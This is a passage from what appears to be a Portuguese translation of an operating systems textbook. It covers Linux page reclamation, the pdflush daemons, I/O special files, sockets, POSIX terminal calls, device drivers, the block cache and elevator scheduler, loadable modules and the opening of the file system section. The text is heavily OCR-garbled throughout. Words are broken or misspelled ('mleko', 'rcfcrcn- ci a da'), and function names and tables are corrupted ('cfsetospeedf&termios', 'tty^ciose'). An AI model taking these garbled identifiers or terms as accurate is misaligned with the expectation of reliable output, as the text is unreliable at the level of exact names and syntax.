e referendada/nao referendada. Esses dois sinalizadores 
codificam quatro estados, conforme mostra a Figura 10.13* 
Durante a primeira varrednra em um conjumo de paginas, 
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I Figura 10.13 Estados de pag i nas considerados pelo aEgor itmo de recu peraęao dem oJduras de pagi n as. 


o PFRA faz a limpeza de sens bits de referenda. Na segtmda 
varredura, caso scja idcntificado quc a pagi na foi rcfcrcn- 
ci a da, ela avanęa para outro esiagio — no qual e me nos 
pmvavd ąue scja solidiada, Caso contra no, a pagina pas¬ 
sa para um estado no qual tein maior possibilidade dc ser 
despejada, 

As paginas na lista de inativas, que nao foram rek- 
rendadas desdc a ultima vez em que foram inspccionadas, 
sao as candidatas mais fortes ao despejo. Na Figura 10.13, 
elas sao as paginas com PG_ativa e PG_referendada definidas 
como 0, Entretanto, caso seja necessaria, as paginas podem 
ser solicitadas mesmo quando estiverem em outros estados, 
Na Figura 10,13, o vetor repreenchimento ii astra essa situaęao, 

A raza o para o PFRA manier paginas na lisia de inati- 
vas embora possani ter sido referendadas e prevenir situa- 
ęóes como a desenia a seguir Considere um processo que 
faz acessos periódicos a diferentes paginas, com perfodo de 
inna hora. Urna pagina acessada no ultimo laęo tera con¬ 
figu rado cm 1 o scu sinalizador dc referenda. Entretanto, 
como a pagina nao sera necessaria novamenie na próxima 
hora, nao ha razao para nao considera-la urna candidata a 
mv'mdicaęao, 

Um aspecto do sistema de gerenriamento de memória 
que nao mcncionamos e um segundo daemon, pdfiush, quc 
na verdade e um conjimto dc daemon threads que atuam 
nos bastidores. Os threads pdfiush (I) acordam periodica- 
nieme — normalmcnte a cada 500 ms — para escrevcr de 
volta no disco as paginas muito amigas e sujas, ou (2) sao 
explidtamente acordados pelo ntkka quando os nweis de 
memória disponfvel ficam abaixo de determmado limite 
para que possani escrever no disco as paginas sujas da ca- 
che dc paginas. No modo laptop, para conservar a vida da 
bateria, as paginas sujas sao escritas no disco semprc que 
threads pdfiush acordam. E possivel tambem que as paginas 
sujas saiam da memória e voltem para o disco medianie so- 
Iicitaęao explicita de sincronizaęao, por meio de chamadas 
de sistema como syne, fsync e fdatasync. Algumas versoes 
mais amigas do Lmm utilizavam dois daemorn separados; 


kupdate, para escrever dc volla paginas antigas, e bdflush, 
para cscrcvcr dc volta paginas antigas sob condięóes de mc- 
mória baixa, No mleko 2.4, essa funcionalidade foi incor- 
porada aos threads pdfiush, A cscollia por miiltiplos threads 
sc den por coiua da necessidade de esconder as longas la- 
tencias de disco. 


10.5 


Entrada/saida no Linux 


O sistema de E/S do Linux e bastante simples e senic- 
Ihanie ao de omros sistemas UNIX, Basicamente, todos os 
dispositivos de E/S sao tratados como arquivos e sao acessa- 
dos com as mesmas chamadas de sistema read e whte usadas 
para acessar todos os arquivos comuns. Em alguns casos, os 
parametros do disposilivo dcvem ser configurados, c isso e 
feito com urna cha mada de sistema especial. Estudarcrnos 
essas ąuestoes nas seęoes a seguir. 


10.5.1 I tonceitos fundamentais 

Assim como todos os compuiadores, aąueks ąue 
execuLam Unux tern dispositivos de E/S como discos, im- 
pressoras e redes conectadas. Torna-se necessaria alguma 
maneira de permitir o acesso a esses dispositivos. Embora 
yarias soluęoes sejam possfyeis, o Linux Integra os dispo- 
sitivos no sistema de arquivos, chamando-os de arquivos 
especiais. Cada dispositivo de E/S ć associado o um nonie 
de caminho, gcralmcntc em fdev. For exemplo, um dis¬ 
co pode ser /dev/hdl r urna impressora pode ser /dev/lp e a 
redc pode ser /de\/net, 

Esses arquivos especiais podem ser acessados da mes- 
ma maneira que os demais arquivos. Nao sao necessarios 
quaisquer comandos especiais nem chamadas de sistema — 
as chamadas usuais open, read e write sao su fi cień t es. Por 
exemplo, o comando 

cp file /dev/lp 

copia o arquivo file na impressora, fazendo com que de 
scja iinprcsso (presumindo que o usuario icnha a permis- 
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sao de acesso a /dev/lp). Os programas podem abrir r ler e 
escrever em arquivos especiais da mesma maneira como 
e feito com arquivos comuns. De fato, o comando cp do 
exempJo amcrior nao lem conhccimento daąuilo que esta 
imprimindo, Assim, nenhum mecanismo espedal e ne- 
cessario para fazcr E/S. 

Os arquivos especiais sao divididos em duas ca tego- 
rias: blocos e caracteres. Uni arquivo espedal de bloco 
consisie cm urna seąuenda de blocos eaumerados. A pro- 
prkdade prindpal do arquivo espedal de bloco e que ca da 
bloco pode ser cndcrcęado e accssado individualniciite t Em 
ou tras palavras, urn próg rama pode abrirum arquivo espe- 
cial dc bloco c kr, digamos, o bloco 124 sem primdro pas¬ 
sa r pdos blocos dc 0 a 123. Os arquivos especiais de blocos 
em geral sao lis a dos em discos. 

Os arquivos especiais de caracteres sao normal¬ 
nienie empregados cm dispositivos cni que a entrada c a 
safda sao feilas como fluxos dc caracteres. Teda dos, im- 
pressoras, redes, inouses, plotters e a maioria dos ontros 
dispositivos de E/S que recebem ou eiwiam dados usam 
arquivos especiais de caracteres. Nao e posswel (ou mesmo 
significativo) procurarpelo bloco 124 em mu mouse. 

Assodado a cada arquivo espedal cxiste uni driver do 
dispositivo que trata o disposilivo corresporidente. Cada 
driver tern urn numer o do dispositivo prindpal, que 
servc pa ra idcntifka-lo* Sc urn driver der su porte a varios 
dispositivos — digamos, dois discos dc mesmo tipo —, cada 
urn tambem tera urn numero do dispositivo secunda- 
rio que o idemifteara. Juntos, os numeros prindpal c se- 
cundario identifieam dc maneira unica cada dispositivo dc 
H/S* Em alguns ca sos, urn driver simpks pode na lar dois 
dispositivos muiio relacionados, Por exemplo, o driver 
correspondente a /dev/tty controla tamo o teclado ąuanio 
a tela, que muitas vezes sao mterpretados como uni dispo- 
sitivo Tmlco — o terminal. 

Embora a maioria dos arquivos especiais de caracte¬ 
res nao possa ser acessada aleatoriamente, esses arquivos 
especiais muitas vezes precisam ser comrolados de unia 
maneira que os arquivos especiais de blocos nao podem. 


Considere, por exemplo, a entrada digitada em um teclado 
e niostrada na tela. Ouando um usuario comete umerro na 
entrada c qucr apagar o ultimo caraciere digitado, ele pres- 
siona aIguma teda. Algumas pcssoas preferem usar a tecla 
backspacc c out ras preferem DEL Do mesmo modo, para 
apagar a linha recem-digitada toda existeni muitas coiwcn- 
ędes, Tradidonalmente, dispunha-se do caraciere mas, 
com a disseminaęaodo correio elctrónico (quc usa @ dentro 
do endcrcęo), muilos sistemas lem adotado CTRL-U ou al- 
gum outro caraciere. Da mesma maneira, para imerromper 
o programa cm execuęao, alguma tecla especial deve ser 
pressionada. Nesse caso tambem, as preferencias variam 
de pessoa para pessoa. Normalnienie e CTRL-C mas essa 
nao e urna escolha universal. 

Em vcz dc fazcr u ma escolha e obrigar todos a fazc- 
rem uso dcla, o Linii x permite quc essas funędes especiais 
c muitas out ras sejam adaptadas ao gosio do usuario. lima 
eh a mada de sistema espedal gerahnente e provida para 
ajustar essas opęoes. Essa chamada de sistema tambem tra¬ 
ta da tecla tab, da ativaęao e desativaęao do ecodos caracte¬ 
res, da conversao entre o retorno de carro (carriage return) e 
oavanęo de linha ( linefeed) e itens similares. A chamada dc 
sistema nao e permitida para arquivos comuns ou arquivos 
especiais dc blocos, 

10.5.21 Transmissao em redes 

Outro exemplo de E/S e a transmissao cm redes, 
como imrodiizida pelo UN1X de Berkeley e copiada qua- 
se quc li terał menie pclo Linu x, O conccito principal no 
projeto dc Berkeley ć o soquete, Oś soqucics sao aualo- 
gos as caixas posła is c a os soąuetcs telefónicos fixados nas 
pa redes, pois pcrmilem que os usuarios sc comumquem 
com a redc, assim como as caixas postais permiiem que 
as pcssoas cni rem em co mato com o sistema postał c os 
soqnctcs telelomcos possi bili tam o uso dc telefones c a co- 
ncxao com o sistema tdefdnico. A utilizaęao dc soąuetcs 
e mosLrada na Figura 10.14. 

Os soąuetcs podem sereriados e deserutdos dinamica- 
mcntc. A criaęao de um soąuctc retorna um descritor dc 
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i Figura to, 14 O uso de $oquete$ na transmissao em reefes. 
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aiquivos, necessario para o estabelecimento de u ma cone- 
xao, a lei tura e a escrila de dados e a liberała o da conexao. 

Cada soąuete da suporte a um tipo cspecifico de trans¬ 
missao em redes, esped fi ca do ąuando o soąuete e criado. 
Os lipos mais comuns sao: 

1. Fluxo confiavd de bytes oricniado a conexao. 

2. Fluxo confiavel de pacotes oricniado a conexno. 

3. Transmissao nao confiavd de pacotes, 

O primeiro tipo de soąuete permite que dois processos 
em diferentes maąuinas esiabeleęam entre si o eqtiivaleme 
a um pipę. Os bytes sao bombeados em urna extremidade 
e reccbidos na outra extremidade na mesma ordem. O sis¬ 
tema garante que todos os bytcs ciwiados cheguem e quc 
isso ocorra na mesma ordem em que foram enviados. 

O segundo tipo e similar ao primeiro, exceto por pre- 
servar a lionteira de pacotes. Se o emissor efetua cinco 
di a mada s separadas a write, ca da u ma de 512 bytes, c o re¬ 
ceptor espera por 2,560 bytcs, com o soąuete tipo i, todos 
os 2,560 bytcs sao retornados dc urna vez. Com o soąuete 
lipo 2, semenie 512 bytcs serao retornados cm urna dia- 
mada. Mais ąuatro out ras chamadas sao necessarias para 
transmitir o restante. O terceiro tipo de soąuete e usado 
para dar ao usuario o acesso aos recursos dc baixo mvd da 
rede. Esse lipo e esperialmente util para aplicaęoes de tem¬ 
po real c para aquelas situaęóes nas quais o usuario qucr 
implemcntar um esquema espedalizado dc trata niemo dc 
erro. Os pacotes podem ser perdidos ou reordenados pela 
rede — nao existe garantia como nos dois primeiros lipos. 
A vantagem desse modo e o alio desempenho, que algumas 
vezes predomina sobre a confiabilidade {por exemplo, em 
transmissao multimfdia, na qual e mais importante a raph 
dez do que a confiaiięa). 

Quando um soąuete e criado, um dos parametros e$- 
pecifica o protocolo a ser usado. Para fltixos confiaveis de 
bytes, o protocolo mais popular e o TCP (transmtssion eon- 
troi protocol— protocolo de com role dc transmissao }♦ Para a 
transmissao nao confiavd de pacotes, o UDP {user datagram 
protocol — protocolo dc datagrama do usuario) c a escolha 
mais usual. Ambos os protocolos sao executados no topo 
do IP (Internet protocol — protocolo Internet). Todos esses 
protocolos su rg i ram na A RPA NET do Departamentu de 
Defesa dos Estados Unidos, e agora formam a base da in¬ 
ternet, Nao existe nenhum protocolo comum para fluxos 
confiaveis de pacotes. 

A mes que um soąuet e possa ser usado para iransmis- 
sao em rede, ele deve ter um endereęo ligado a cle. Esse 
endereęo pode estar entre wir i os domin i os de nomes exis- 
tentes. O domuiio mais comum e o donimio de nomes da 
Internet, que usa inteiros dc 32 bits para nomear os pornos 
da rede, na Versao 4, e inteiros de 128 bits na Vcrsno 6 (a 
Ycrsao 5 foi urn sistema expcrimentai que nao deu certo). 

Dcpois que os soąuctcs foram criados nos computado- 
res da origem e do destlno, unia conexao pode ser esiabe- 


leckla entre eles (para conunncaęao orientada a conexao). 
Um lado faz unia chamada de sistema listen no soąuete 
local, a qual cria um buffer e fica bloąueada ale a che- 
gada do dado. O outro lado laz urna chamada de sistema 
connect, pas san do como parametros o dcscritor dc arąni- 
vos do soąuete local c o endereęo do soąuete remoto. Sc o 
lado remoto accita a chamada, o sistema en ta o cstabdccc 
u ma conexao entre os soąuctcs, 

Dcpois que a conexao foi estabelecida, seu funciona- 
mento e parecido com um pipę, Um processo pode ler e 
cscrcver nela usando o dcscritor de arqnivo de seu soąuete 
local. Quando a conexao nao c mais nccessaria, da pode 
ser fcchada dc modo usual, via chamada de sistema close, 

_ 10.5.51 Chamadas de sistema para 

entrada/saida no Linux 

Cada dispositivo dc E/S no sistema Linux possui, em 
geral, um arąuivo especial assotiado a dc* A maioria das 
E/S pode ser feita simplesmemc pelo uso doarquivo correto, 
ditninando a ncccssidadc dc chamadas de sistema especiais, 
No entamo, algumas vezes existe u ma nccessidade de algo 
espedfko do disposittvo. Antes do POSIX, a maioria dos sis- 
temas UNIX lin ha uma chamada de sistema, bctl, que cxe^ 
cutava inumerasaęoesespecflicas dos disposiiivos nosarąui- 
vos especiais. Com o passar do tempo, da se lornou muito 
confusa* O POSIX simplificou-a e distribuiu suas funęoes em 
chamadas separadas, primeiro para os tcmiinais. No Linux e 
em sistemas UNIX modernos, cada uma e uma chamada de 
sistema sępa rada, ou elas companilham uma unica chamada 
de sistema, ou tudo fi ca dependentc de implcmentaęao. 

As prinieiras ąuatro chamadas relacionadas na Tabela 
10.6 sao usadas para obler e ajustar a vdocidade do termi¬ 
nal. Algumas chamadas diferentes sao fornccidas para a cn- 
Lrada e a salda porąue os modems operam em yclocidades 
diferenles. Por exemplo, os sistemas autigos de videotexto 
permitiam quc as pessoas accssassem dc sua casa as bases 
dc dados publieas, com reąuisięoes eurtas para um semdor 
a uma iaxa de 75 bits/s com respostas retornando a 1.200 
bit$/s. Esse padrao foi adoiado porąue a taxa de 1.200 bits/s 
em ambas as direęoes era muito cara para usuarios domes- 
tteos. Essa assimetria ainda persistei algumas companhias 
tclefonicas ofereccm servięos a 8 Mbps para recepęao e a 
512 kbps para envio, muitas vezes soh o nome de ADSL 
{asymmetrk digita l suhscńber lin e — li n Ii a d i gi i a 1 a ssl m et ri ca 
do assinantc). 

As ultimas duas chamadas da lista em ąuestao sao usa- 
das para a configuraęao c a leitura de volia de todos os ca- 
racteres especiais empregados para a deleęao de caracteres 
c linhas, interrupęao de processos e assim por dianie. Al cm 
disso, das liabilitain c desabilitam o cco, tratam do fluxo 
de conlrole e de out ras fu nęoes relacionadas. Existcm ain- 
da outras chamadas a funęoes de E/5 r mas, como das sao 
e sp e dali zada s, nao iremos muito a fundo. Alom disso, a 
chamada ioett ainda existe. 
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Chamada a funęao 

Descrigao 

$ = cfsetospeedf&termios, speed} 

Ajusta a ve!ocidade de salda 

s = clsetispeed^termios, speed) 

Aj usta a velocidade de entrada 

s = cfgetospeedf&termios, speed) 

Obtem a velocldade de saida 

s = cfgtetispeedf&termios, speed) 

Obtśm a veioddade de entrada 

s = tcsetattr(fd r opt, Stermios) 

Ajusta os atributos 

s = tcgetattrffd. Stermios) 

Obfśnn os atributos 


I Tabela 10.6 As principais chamadas do P0SIX para o gemnciamentc de terminal. 


10p5-4 I Implementacjo de entrada/saida 
no Linux 

A E/S no Linux 6 implementada por nm conjunto dc 
drivcrs dc dispositivos, urn para cada lipo dc disposUivo, A 
funęao dos drivers c isolar o restante do sistema das idios- 
sinerasias do hardware. Por rneio do fomecimemo dc i mor¬ 
fa ces padronizadas entre os drivers e o restante do sistema 
opera clona!, grandę parte do sistema de E/S pode ser inse- 
rida na poręao do nucleo que e independeme cle maąuina. 

Quando o usuario acessa umarquivoespecial, o sistema 
dc arquivos dc ter mina os nu mero s do disposilivo principal e 
secundario pertcnccmes a dc e sc dc e um arquivo especial 
de bloco ou de caracterc. O n u mero do dispositivo principal 
e osado para indexar urna entre duas tabeks iniemas, A es¬ 
tru mrą ioealizada tomem pomeiros para os procedimentos 
das chamadas de a be nura, leitura e escriia no dispositwo, 
entre outras. O mimero do disposMvo secundario e passa- 
do como um parametru. A indusao de um novo disposiMvo 
no Linux implica a indusao dc urna nova entrada cm urna 
dessas tabel as c o fo mcci men to dos procedimentos corres- 
pondentes para trataras vanas opcraęócs sobrc o dispositivo. 

Algumas das operaęoes que podem ser associadas com 
dilerentes dispositivos de caracteres sao aprescniadas na 
Tabela 10.7. Cada lin ha se refere a um unico dispositivo 
de E/S (isio ć, um unico dr[ver). As colunas representarn 
as hmędes que todos os drivcrs de caracteres dcvcm imple- 
men tar. Podem existir varias outras fimęaes. Quando u ma 
opcraęao c executada cm um arquivo especial dc caracterc, 
o sistema indexa para a tabel a de espalhamento de dispo- 


sitivos de caracteres para selecionar a estru tura correta, 
quando, entao, chama a funęao correspondente para rea- 
lizar o trabalho que deve ser executado, Assim, cada ope- 
raęao dc arquivo contem um ponteiro para uma funęao 
eon li da no driver correspondente. 

Cada driver e dividido ent duas part es, ambas as quais 
sao parte do nucleo do Linux e ex ecu tam no modo nucleo. 
A metade superior executa no contexto do chamador c faz 
a imerface com o restante do Linux. A metade interior cxe- 
cuta nocomexto do nucleo e Łmeragc com o dispositivo. Os 
drivers podem fazer chamadas de rotinas do nucleo para 
alocaęao dc memória, gcrcnciamento dc temporizador, 
controle de DMA e outras coisas. O coojimto das lunęoes 
do nucleo que podem ser chamadas e definido em um do- 
cumento chamado Interface Nudeo-Driver, A cscrita dc 
drivcrs para o dispositivo e abordada cm dctaihcs cm Egan 
e Teixeita {1992) c Rubini et al. (2005). 

O sistema de E/S e dmdido em dois componentes prin¬ 
cipais: o manipulador de arqnivos especiais de blocos e o 
manipulador de arquivos especiais de caracteres. Vamos 
agora imestigar cada um desses componentes, 

O objęlivo da parte do sistema que faza E/s nos dispo- 
sitivos especiais dc bloco {por exemplo r discos) e minimizar 
o nu mero dc transferencias que devem ser feitas. Para isso r 
os sistemas Linux tern urna cache entre os drivers do disco 
c o ststcma dc arquivos, como ilustrado na Figura 10,15, 
Antes do nucleo 2.2, o Linux manlinha cachcs de pagina c 
de buffer complela nieme separadas, de modo que um ar- 
quivo residente em um bloco do disco poderia ser armaze- 


Disposifivo 

Open 

Close 

Read 

Writo 

loctl 

Outros 

Nuli 

nuli 

nuli 

nuli 

nuli 

nuli 


Memória 

nuli 

nuli 

nnem read 

mem write 

nul! 


Teclado 

k open 

k close 

k read 

error 

kjoctl 


Terminal 

tty open 

tty^ciose 

tty read 

tty write 

ttyjoctl 


Impressora 

fpjopen 

Ip.close 

error 

lp_write 

Ipjoctl 



I Tabela 10.7 Algumas operagóes de arquivos para dispositivo$ de caracteres tipicos. 
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I Figura 10,15 O sistema de E/S da Linux masłranda um sistema de arquivos em detalhes. 


nada cm ambas as cachcs. Nas vcrsocs mais novas, o Linux 
passo u a Ler so menie uma cache unifieada. Uma camada 
de bloco gmerka agmpa esses componemes, exetuta as tra- 
dnęoes nccessarias enlre seiorcs dc disco, blocos, buffers c 
paginas dc dados e pennite opcraęóes entre elas. 

A cache e uma tabela no nudeo para armazenamen- 
to de mUhares de blocos utilizados mais reccntcmcrUe. 
Quando um bloco de disco e necessario poralgum motivo 
(i-node, diretório ou dado), priineiro e feiia uma verilka- 
ę t ao na cache para saber sc o quc sc qucr esia la. Caso es- 
tcja r cie e lirado de la e evita-sc um acesso ao disco, o que 
rcsulta cm grandes melhoras no desempenho do sistema. 

Se o bloco nao esia na cache de paginas, ele e lido a par- 
tir do disco e colocado na cache e r dc la, e copiado para onde 
esta sondo reąuisUado. Visto que a cache de paginas tern en- 
t rad as so menie para um nu mero lixo de blocos, e cha mad o 
o algorilmo de substituięao destrho na seęao anlerior. 

A cache de paginas trabalha tamo com escriias quan- 
to com leituras. Quando urn programa escreve um bloco, 
de vai para a cache, e nao para o disco. O daemon pdflmh 
ira descarregar o bloco para o disco quando o lamanho da 
cache a u me mar para alem dc um valor esperifko. Alem 
disso, para evhar quc os blocos esperem muilo tempo na 
cache ant es de serem escritos no disco, todos os blocos mo- 
dificados sao escritos no disco a cada 30 segtmdos. 

Para reduzir a l a Le n da de movimentos repetidos da 
cabeęa de disco, o Liniix recorre a urn escalonador de 
E/S, cuja finalldade e reorganizar ou agrupar as solicita- 
ędes de escrita/leitura aos d|sposiiivos de blocos. Exisiem 
diversas variaęoes de escalonamento, olimizadas para di- 
feremes cargas de trabaIho. O escalonador basico do Linux 
bascia-se no escalonador do elevador de Linus, cujas 
opera ęoes podem ser resumidas da ścguirue manę ira: as ope- 
raędes de disco sao organ i zad as em uma lista duplamente 


encadeada ordenada pelo endcrcęo do setor da solidtaęao 
do disco. As novas soliciiaęoes sao inseridas nessa lista de 
forma ordenada e isso evita os custosos movimemos re- 
petidos da cabeęa de disco. A lista de solkitaęoes e eniao 
ligada, dc modo quc as operaęoes adjacentes sejam en- 
viadas por urna unica solidtaęao de disco. O escalonador 
do devador basico pode kvar a inanięao* Assim sendo, a 
vcrsao rcvisada do escalonador dc discos do Linux inclui 
duas listas adicionais, mantendo as opcraęoes dc leiiura c 
escrita ordenadas por seu prazo. O padrao para os prazos 
e 0,5 s para soliritaęoes de leittira e 5 s para soliciiaęoes de 
escrita. Se um prazo definido pelo sistema para a operaęao 
de escriia mais antiga esia prestes a expirar, essa solidtaęao de 
escrita sera atendida antes de qualquer outra na lista du- 
plameme encadeada Principal. 

Alem dos arquivos de disco regulares, existem tambem 
os arquivos de bloco especiais — tambem chamados de ar- 
quivos de bloco brutos (rmv). Esses arqmvos pertnitem 
que os programas acessem o disco milizando numeros de 
bloco absolutos sem relaęao com o sistema dc arquivos, 
Eles sao mais frequentemente utilizados para tarefas como 
paginaęao c manutcnęao do sistema, 

A inieraęao com disposiiivos de caracieres e simptes 
pois, como esses dispositivos produzem ou consomem ca- 
dcias dc caracieres ou bytes de dados, o suporie ao accs- 
so aleatório nao faz muito sentido. Uma exceęao e o uso 
dc disciplinas de linhas r quc pode estar assodado a um 
terminal, represemado pela estrutura tty_struct f c quc rc- 
presenta um interpretador para os dados irocados com o 
dispositivo terminal. Por exemplo, pode ser feita a cdi ęao 
local de linlias (ou seja, caracieres e linhas apagados po- 
dem ser removidos), retornos de carro podem ser mapea- 
dos em alimentaęoes de lin ha e omros processamentos es¬ 
peciais podem ser conclmdos. Entretanto, se um processo 
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deseja mteragir coni todos os caracteres, ele pode colocar 
a linha no modo brulo e isso fara com que a disciplina de 
linhas seja contornado. Nem todos os disposkivos possueni 
disriplinas de linhas. 

A safda irabalha de maneira senidhante, expandmdo 
tabulaęoes cm espaęos, eon ver len do alimcntaęoes dc linha 
om reiomos de carro + alimemaęoes de linha, aereseen- 
lando cara cle res de preenchimento seguidos dc retom o 
de carro em termin ais niecą nicos Icntos etc. Assim como 
a entrada, a salda pode acessar o tratador de linhas (modo 
processado) on ignora-lo {modo brulo). O modo brum e 
cspccialmcntc uril no cnvio dc dados binanos a outros 
computadores por meio dc urna porta serial c para GUIs. 
Aqui, nenhuma conversao e desejada. 

A interaęao com dispositivos de rede e um pouco 
difereme. Embora esses dis posili vos lambern produzam/ 
consumam Huxos de cara eter es, sua naiureza as sin ero na 
faz com que sejam menos apropriados para a facil inle- 
graęao sob a mesma interface que os outros dispositivos 
de caracteres. O driver de dispositivo de rede produz pa- 
cotes formados por muUiplos bytes de dados e cabeęalltos 
de rede. Os pacotes sao, entao, roteados por unia serie de 
drivers de protocolos de rede e, em ultima instaneia, sao 
passados ao espaęo de aplicaęao do usuario. Uma estru tura 
de dados essencia! e a estrutura de bufier de soąuete skbuff, 
usada para represemar poręoes da memória preenchidas 
com dados de pacoies. Os dados em um buffer skbuffnęm 
sempre inidam no comeęo do buffer. Como estao sendo 
processados por diferemes protocolos na pilha de rede, os 
cabeęalhos de protocolo po dem ser removidos ou inseridos, 
Os processos do usuario imeragem com os dispositivos de 
rede por meio de soqueies que, no Lin mc dao suporte a 
APi do soquete BSD. Os drivers de protocolo podem ser 
ignorados e o acesso direto aos dispositivos de rede pode 
ser viabilizado por meio de nm_$ecket$< Somenie superusu- 
arios tern permissao para criar soąuetes brutos. 

10.5.51 Módulos no Linux 

Durantc decadas, os drivcrs dos dispositivos UNIX cram 
estalkamcme ligadosao nucleo e, com isso, ficavam todos 
residentes na memória sempre que o sistema era iniciado. 
Em vlrtnde do amblente no qual o UNIX se deseńvolveu — 
Principal menie nos minko mputadores e nas estaędes de 
irabalho avanęadas, com seus conjuntos pequenos e inal- 
lerados de disposilivos de E/S —, esse esqucina funcionava 
bcm. Basi ca me mc, cada centro computacional consirufa 
um nucleo contcndo os drivers dos dispositivos dc E/S quc 
dc linha. Sc no ano seguinte adąuirisse um novo disco, dc 
rdigava o nucleo. Nada de especiah 

Com a chegada do Linux para PC, ludo mudou de rc- 
pente. 0 numero de disposiitvo$ de E/S dispomVeis nos PCs 
c maior do que em qualqtier minicomputador. Alem disso, 
embora os usutiriosdo Linnx tenham (ou possam ter Eacił- 


menie) o código-fonie completo, provavelmente a maioria 
deles sente dificuldade para induir drivers, atualizar todos 
os dispositivos de drivers relacionados a estruturas de da¬ 
dos, religar o nucleo e, por im, preparar o sistema para rei- 
nicializar corrctamente (sem considerar os problemas quc 
surgem quando o nucleo nao fundona). 

O Linux resolveu esse problema com o conceito de 
módulos carregaveis. Esses módulos sao blocos de có- 
digos que podem ser carregados no nucleo enquanto o 
sistema esta em execuęao. NormaImente sao drivers de 
dispositivos de caractere ou blocos, mas tambem podem 
ser sistemas de arquivos completos, protocolos de redes, 
ferramentas dc monitorami o dc desempenho ou qualquer 
outro módulo desejaveh 

Quando um módulo e carregado, varias coisas devem 
acontecer. Primetro, o módulo deve serrealocado dinamica- 
mente d u ran te o carregamento* Em segundo lugar, o sisie- 
ma deve verificar sc os recursos de quc o driver prerisa estao 
dispomVeis (por excmplo, nfveis dc reąuisięao de inter- 
rupeoes) e, caso estejam, esses recursos tem dc set marcados 
como cm uso. Em tcrcciro, todos os vctorcs dc interrup- 
ęoes neccssarios devem ser aj usta dos. Em quarto, a tabela 
de drivers precisa ser atualizada para iratar o novo lipo de 
dispositivo. Por firn, o driver pode ser executado para Ini- 
cializar as caracterisiicas especfficas do dispositivo que fo¬ 
rem necessarias. O driver estara totalmente instalado, uma 
vez que todas essas etapas estejam conclutdas, assim como 
ocorre com um driver estaticamente instalado. Outros siste¬ 
mas UNIX modemos ja dao supone a módulos carregaveis. 


10.6 


O sistema de arquivos do 
Linux 


A parte mais visfvel dc qualquer sistema operacional 
indusive do Liniix, e o sistema de arquivos. Nas seęoes a 
seguir, esami na rcmos as idcias basicas rclacionadas ao sis- 
tema dc arquivos do Linux, as cha mada s de sistema e como 
o sistema dc arquivos e implementado. Algumas dessas 
idcias derivam do jMULTICS e mtutas dclas foram copiadas 
pelo MS-DOS, pelo Windows c por outros sistemas, mas 
mitras idcias sao exclusivas dos sistemas baseados no UNIX. 
O p roje to do Limtx e espe ciał menie interessante porąue 
ele ilustra nitidamente o princfpio 'O pcqueno e bonito'* 
Com um mmimo de mecanismo e um mi mero muito li- 
mitado de chamadas de sistema, o Linux fornece, contudo, 
um sistema de arquivos poderoso e elegante. 


10Al I Conceitos fundamentais 

O primeiro sistema de arquivos do Lmux foi o do MINIX 
t. Entretanto, como ele limitava o nonie dos arquivos a 14 
caractcres {para manier a compaiibilidade com o UNIK 7), e 
scu tamanho maximo de arquivo era 64 MB (o puc era um 
exagero dianie dos discos rigidos de 10 MB da epoca), hou- 
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ve interesse em sistemas de arquivos melhores quase desde 
o princfpio do deseńvolvimento do Linux ( o que comeęou 
cerca de cineo anos depois de o MIN1X I ter sido liberado. A 
primeira melhora se deu no sistema de arquivos ext, que pas- 
sou a permitir nomes dc ate 255 caractercs c arquivos de 2 
GB. Esse sistema, eon Lu do, era mais lento do que o MINIX 1 
e, assim, a busca por melhoras continuom Acabaram inven- 
tando o sisiema de arquivos exi2, com nomes de arquivos 
longos, arquivos maiores e mellior desempenho, o que fez 
dele o principal sistema de arquivos. Emretanto, o Linux da 
suporte a diferemes sistemas de arqnivos utilizando a eamada 
VFS (vinualfile system — sistema de arquivos virtual) F que e 
desenia na próxima seęao. Q Lian do o Linux e ligado, e preci- 
so definir quais sistemas dc arquivos devem ser compilados 
com ruideo. Os outros podem ser dinamicamenie carregados 
como módolos durante a exccnęao, caso seja necessario. 

Um arquivo do Łinux ć u ma scqiienria de O ou mais 
bytes contendo qualquer informaęao. Nenhuma distinęao 
e kita entre arquivos ASCII, arquivos binarios on quais- 
quer outros tipos dc arquivos. O significado dos bits cm 
nm arqnivo ć dc total conhccimcnto do proprictario do 
arquivo. O sistema nao sc preocupa com isso. Os nomes 
dos arquivos sao limitados a 255 caradcrcs, e todos os ca- 
ractcres ASCII exceto NUL, sao permitidos nos nomes dos 
arquivos, dc modo que um nome dc arquivo consistindo 
cm Licś ret orno s de carro [carriage returns) ć um nome de 
arqulvo valido (mas nao conveniente). 

Por convenę3o, mu ii os programas esperam que os no¬ 
mes de arquivos sejam constilufdos por urn nome basico 
seguido de um porno (que va!e por um earactere) e urna ex- 
tensao. Assim prog.cem geral e um programa em C; pro$fi9Q 
normalnienie e um programa em Fortran 90 e prog.o costu- 
ma ser um arquivo-objeto (gerado pelo compilador). Essas 
convenęóes nao sao exigidas pelo sistema opera ci on a 1, mas 
alguns compiladores e outros programas assim o desejam. 
O tamanho das extensoes e iivre e os arquivos podem ter 
vadas extensoes — como em progatmiyz, provavdmente 
um programa em Java comprimido com o $zip. 

Os arquivos podem ser agrupados cm diretórios por 
questoes dc convenienda. Os diretórios sao armazena- 
dos como arquivos c cm grandę parte sao passfvcis de ser 
traiados como arquivos. Eles podem eomer subdiretórios, 
proporcionando um sistema dc arquivos hierarquico. O di- 
retório-raiz e cha mado / e geralmcntc contem varios subdi- 
rclórios. O earactere /lambem c usado para separar nomes 
de diretórios; assim, o nome Zusria$l/x indica o arquivo x 
localizado no diretório ast, que esta no direiório lusr. Al- 
guns dos diretórios principais próximos ao topo da arvore 
hierarąuica sao mosirados na Tabela 10.5. 

Existcm duas ma n ci ras de cspedficar os nomes dc ar- 
quivos no Linux P tanto no shell quanto durante a abcrtiua 
de um arquivo por meto de um programa. A primeira ma- 
neira consiste em usar o caminho absoluto, qtie espe- 
cilka como obter o arquivo a partir do di retório-raiz. Um 


Diretório 

Conteudos 

btrr 

Programas binórios (executcLveis) 

dev 

Arquivos espedats para dispositlvos de E/S 

etc 

Arquivos diversos do sistema 

lib 

Bibliotecas 

usr 

Diretórios de usuarios 


Tabela 10.8 Alguns diretórios importantes encontrados na 
materia dos sistemas Unux. 


cxcmpk> dc caminho absoiuto e łusr/astihooksimosVchap-lO t 
quc pede ao sistema para pro cu rur no di retório-raiz nm di¬ 
retório chamado usr, depois um outro diretório chamado 
ast, Esse diretório conteni o diretório books f ąuc contem o 
diretório nm3, que contem o arquivo chap-10. 

Os nomes dc caminhos absolutos miiitas vezcs sao 
longos e inconvenientes. Por cssa razao, o Linux pemiite 
quc usuarios e proccssos definam o diretório no qual des 
estejam tra bal hando atualmcnte como o diretório de tra¬ 
